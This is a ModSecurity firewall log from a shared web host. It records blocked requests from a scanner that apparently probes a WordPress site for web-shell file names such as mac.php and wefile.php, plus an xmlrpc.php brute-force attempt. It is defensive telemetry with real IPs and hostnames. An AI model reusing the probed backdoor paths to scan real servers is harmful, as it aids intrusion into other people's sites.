[Tue May 26 14:14:09.618441 2026] [security2:error] [pid 598542:tid 598715] [client 20.151.112.53:51895] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahVdWf4iWyZxnXeAW3I_zwAAACs"]
[Tue May 26 14:14:09.618541 2026] [security2:error] [pid 598542:tid 598715] [client 20.151.112.53:51895] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/mac.php"] [unique_id "ahVdWf4iWyZxnXeAW3I_zwAAACs"]
[Tue May 26 14:14:10.032596 2026] [security2:error] [pid 598542:tid 598732] [client 20.151.112.53:42077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahVdWv4iWyZxnXeAW3I_4QAAADw"]
[Tue May 26 14:14:10.032693 2026] [security2:error] [pid 598542:tid 598732] [client 20.151.112.53:42077] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/25d653587fdfd1.php"] [unique_id "ahVdWv4iWyZxnXeAW3I_4QAAADw"]
[Tue May 26 14:14:10.241350 2026] [security2:error] [pid 598542:tid 598706] [client 20.151.112.53:42072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahVdWv4iWyZxnXeAW3I_6wAAACI"]
[Tue May 26 14:14:10.241458 2026] [security2:error] [pid 598542:tid 598706] [client 20.151.112.53:42072] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahVdWv4iWyZxnXeAW3I_6wAAACI"]
[Tue May 26 14:14:10.413122 2026] [security2:error] [pid 598542:tid 598734] [client 20.151.112.53:51950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahVdWv4iWyZxnXeAW3I_8QAAAD4"]
[Tue May 26 14:14:10.413205 2026] [security2:error] [pid 598542:tid 598734] [client 20.151.112.53:51950] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/casp3.php"] [unique_id "ahVdWv4iWyZxnXeAW3I_8QAAAD4"]
[Tue May 26 14:14:10.640451 2026] [security2:error] [pid 598542:tid 598798] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdWv4iWyZxnXeAW3I_5wAAAH4"]
[Tue May 26 14:14:10.678669 2026] [security2:error] [pid 598542:tid 598785] [client 20.151.112.53:51932] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/post-comments-form/"] [unique_id "ahVdWv4iWyZxnXeAW3JAAAAAAHE"]
[Tue May 26 14:14:10.929799 2026] [security2:error] [pid 598542:tid 598757] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdWv4iWyZxnXeAW3JADQAAAFU"]
[Tue May 26 14:14:11.006297 2026] [security2:error] [pid 598542:tid 598776] [client 20.151.112.53:51932] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-admin/js/"] [unique_id "ahVdW_4iWyZxnXeAW3JAEQAAAGg"]
[Tue May 26 14:14:11.081579 2026] [security2:error] [pid 598542:tid 598727] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdW_4iWyZxnXeAW3JAEgAAADc"]
[Tue May 26 14:14:11.160784 2026] [security2:error] [pid 598542:tid 598693] [client 20.151.112.53:51932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVdW_4iWyZxnXeAW3JAFwAAABU"]
[Tue May 26 14:14:11.160871 2026] [security2:error] [pid 598542:tid 598693] [client 20.151.112.53:51932] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colour.php"] [unique_id "ahVdW_4iWyZxnXeAW3JAFwAAABU"]
[Tue May 26 14:14:11.267782 2026] [security2:error] [pid 598542:tid 598763] [client 45.94.31.11:50022] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 11.31.94.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jkjuice.com"] [uri "/xmlrpc.php"] [unique_id "ahVdW_4iWyZxnXeAW3JAGAAAAFs"]
[Tue May 26 14:14:11.267886 2026] [security2:error] [pid 598542:tid 598763] [client 45.94.31.11:50022] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "jkjuice.com"] [uri "/xmlrpc.php"] [unique_id "ahVdW_4iWyZxnXeAW3JAGAAAAFs"]
[Tue May 26 14:14:11.322960 2026] [security2:error] [pid 598542:tid 598724] [client 20.151.112.53:22222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahVdW_4iWyZxnXeAW3JAHAAAADQ"]
[Tue May 26 14:14:11.323107 2026] [security2:error] [pid 598542:tid 598724] [client 20.151.112.53:22222] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/half.php"] [unique_id "ahVdW_4iWyZxnXeAW3JAHAAAADQ"]
[Tue May 26 14:14:11.484193 2026] [security2:error] [pid 598542:tid 598714] [client 20.151.112.53:51866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahVdW_4iWyZxnXeAW3JAJAAAACo"]
[Tue May 26 14:14:11.484298 2026] [security2:error] [pid 598542:tid 598714] [client 20.151.112.53:51866] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/2P.php"] [unique_id "ahVdW_4iWyZxnXeAW3JAJAAAACo"]
[Tue May 26 14:14:11.629525 2026] [security2:error] [pid 598542:tid 598729] [client 20.151.112.53:8423] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahVdW_4iWyZxnXeAW3JAJgAAADk"]
[Tue May 26 14:14:11.629655 2026] [security2:error] [pid 598542:tid 598729] [client 20.151.112.53:8423] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/tires.php"] [unique_id "ahVdW_4iWyZxnXeAW3JAJgAAADk"]
[Tue May 26 14:14:11.799157 2026] [security2:error] [pid 598542:tid 598793] [client 20.151.112.53:25442] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wordpress/wp-admin/maint/"] [unique_id "ahVdW_4iWyZxnXeAW3JALAAAAHk"]
[Tue May 26 14:14:11.880990 2026] [security2:error] [pid 598542:tid 598777] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdW_4iWyZxnXeAW3JALwAAAGk"]
[Tue May 26 14:14:11.954485 2026] [security2:error] [pid 598542:tid 598692] [client 20.151.112.53:25442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahVdW_4iWyZxnXeAW3JAOQAAABQ"]
[Tue May 26 14:14:11.954611 2026] [security2:error] [pid 598542:tid 598692] [client 20.151.112.53:25442] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahVdW_4iWyZxnXeAW3JAOQAAABQ"]
[Tue May 26 14:14:12.152307 2026] [security2:error] [pid 598542:tid 598782] [client 20.151.112.53:25416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahVdXP4iWyZxnXeAW3JAPQAAAG4"]
[Tue May 26 14:14:12.152435 2026] [security2:error] [pid 598542:tid 598782] [client 20.151.112.53:25416] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahVdXP4iWyZxnXeAW3JAPQAAAG4"]
[Tue May 26 14:14:12.295412 2026] [security2:error] [pid 598542:tid 598695] [client 20.151.112.53:51952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVdXP4iWyZxnXeAW3JAQQAAABc"]
[Tue May 26 14:14:12.295506 2026] [security2:error] [pid 598542:tid 598695] [client 20.151.112.53:51952] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVdXP4iWyZxnXeAW3JAQQAAABc"]
[Tue May 26 14:14:12.450952 2026] [security2:error] [pid 598542:tid 598725] [client 20.151.112.53:8395] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahVdXP4iWyZxnXeAW3JAQgAAADU"]
[Tue May 26 14:14:12.451093 2026] [security2:error] [pid 598542:tid 598725] [client 20.151.112.53:8395] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahVdXP4iWyZxnXeAW3JAQgAAADU"]
[Tue May 26 14:14:12.613668 2026] [security2:error] [pid 598542:tid 598685] [client 20.151.112.53:51863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahVdXP4iWyZxnXeAW3JASQAAAA0"]
[Tue May 26 14:14:12.613828 2026] [security2:error] [pid 598542:tid 598685] [client 20.151.112.53:51863] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahVdXP4iWyZxnXeAW3JASQAAAA0"]
[Tue May 26 14:14:12.617432 2026] [security2:error] [pid 598542:tid 598694] [client 20.104.227.76:19886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "tsfsnew.ca.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVdXP4iWyZxnXeAW3JASgAAABY"]
[Tue May 26 14:14:12.760891 2026] [security2:error] [pid 598542:tid 598700] [client 20.151.112.53:22269] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-admin/css/"] [unique_id "ahVdXP4iWyZxnXeAW3JATwAAABw"]
[Tue May 26 14:14:12.836414 2026] [security2:error] [pid 598542:tid 598771] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdXP4iWyZxnXeAW3JAUAAAAGM"]
[Tue May 26 14:14:12.908983 2026] [security2:error] [pid 598542:tid 598742] [client 20.151.112.53:22269] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/x/"] [unique_id "ahVdXP4iWyZxnXeAW3JAUQAAAEY"]
[Tue May 26 14:14:12.983710 2026] [security2:error] [pid 598542:tid 598776] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdXP4iWyZxnXeAW3JAUwAAAGg"]
[Tue May 26 14:14:13.057699 2026] [security2:error] [pid 598542:tid 598750] [client 20.151.112.53:22269] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/modern/"] [unique_id "ahVdXf4iWyZxnXeAW3JAWQAAAE4"]
[Tue May 26 14:14:13.134612 2026] [security2:error] [pid 598542:tid 598799] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdXf4iWyZxnXeAW3JAWgAAAH8"]
[Tue May 26 14:14:13.162258 2026] [security2:error] [pid 598542:tid 598730] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdXP4iWyZxnXeAW3JATgAAADo"]
[Tue May 26 14:14:13.205243 2026] [security2:error] [pid 598542:tid 598763] [client 20.151.112.53:22269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahVdXf4iWyZxnXeAW3JAXgAAAFs"]
[Tue May 26 14:14:13.205318 2026] [security2:error] [pid 598542:tid 598763] [client 20.151.112.53:22269] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahVdXf4iWyZxnXeAW3JAXgAAAFs"]
[Tue May 26 14:14:13.348315 2026] [security2:error] [pid 598542:tid 598706] [client 20.151.112.53:22813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahVdXf4iWyZxnXeAW3JAYQAAACI"]
[Tue May 26 14:14:13.348445 2026] [security2:error] [pid 598542:tid 598706] [client 20.151.112.53:22813] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahVdXf4iWyZxnXeAW3JAYQAAACI"]
[Tue May 26 14:14:13.544686 2026] [security2:error] [pid 598542:tid 598769] [client 20.151.112.53:35394] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahVdXf4iWyZxnXeAW3JAawAAAGE"]
[Tue May 26 14:14:13.544767 2026] [security2:error] [pid 598542:tid 598769] [client 20.151.112.53:35394] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahVdXf4iWyZxnXeAW3JAawAAAGE"]
[Tue May 26 14:14:13.691428 2026] [security2:error] [pid 598542:tid 598793] [client 20.151.112.53:35413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahVdXf4iWyZxnXeAW3JAbAAAAHk"]
[Tue May 26 14:14:13.691540 2026] [security2:error] [pid 598542:tid 598793] [client 20.151.112.53:35413] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahVdXf4iWyZxnXeAW3JAbAAAAHk"]
[Tue May 26 14:14:13.843956 2026] [security2:error] [pid 598542:tid 598721] [client 20.151.112.53:22148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/pucci.php"] [unique_id "ahVdXf4iWyZxnXeAW3JAcwAAADE"]
[Tue May 26 14:14:13.844202 2026] [security2:error] [pid 598542:tid 598721] [client 20.151.112.53:22148] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/pucci.php"] [unique_id "ahVdXf4iWyZxnXeAW3JAcwAAADE"]
[Tue May 26 14:14:13.990339 2026] [security2:error] [pid 598542:tid 598707] [client 20.151.112.53:25434] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/details/"] [unique_id "ahVdXf4iWyZxnXeAW3JAeQAAACM"]
[Tue May 26 14:14:14.065703 2026] [security2:error] [pid 598542:tid 598697] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdXv4iWyZxnXeAW3JAegAAABk"]
[Tue May 26 14:14:14.143949 2026] [security2:error] [pid 598542:tid 598741] [client 20.151.112.53:25434] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/audio/"] [unique_id "ahVdXv4iWyZxnXeAW3JAfAAAAEU"]
[Tue May 26 14:14:14.218389 2026] [security2:error] [pid 598542:tid 598720] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdXv4iWyZxnXeAW3JAgQAAADA"]
[Tue May 26 14:14:14.289363 2026] [security2:error] [pid 598542:tid 598672] [client 20.151.112.53:25434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahVdXv4iWyZxnXeAW3JAggAAAAA"]
[Tue May 26 14:14:14.289509 2026] [security2:error] [pid 598542:tid 598672] [client 20.151.112.53:25434] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/one.php"] [unique_id "ahVdXv4iWyZxnXeAW3JAggAAAAA"]
[Tue May 26 14:14:14.455684 2026] [security2:error] [pid 598542:tid 598715] [client 20.151.112.53:4845] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-temp.php"] [unique_id "ahVdXv4iWyZxnXeAW3JAgwAAACs"]
[Tue May 26 14:14:14.455818 2026] [security2:error] [pid 598542:tid 598715] [client 20.151.112.53:4845] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-temp.php"] [unique_id "ahVdXv4iWyZxnXeAW3JAgwAAACs"]
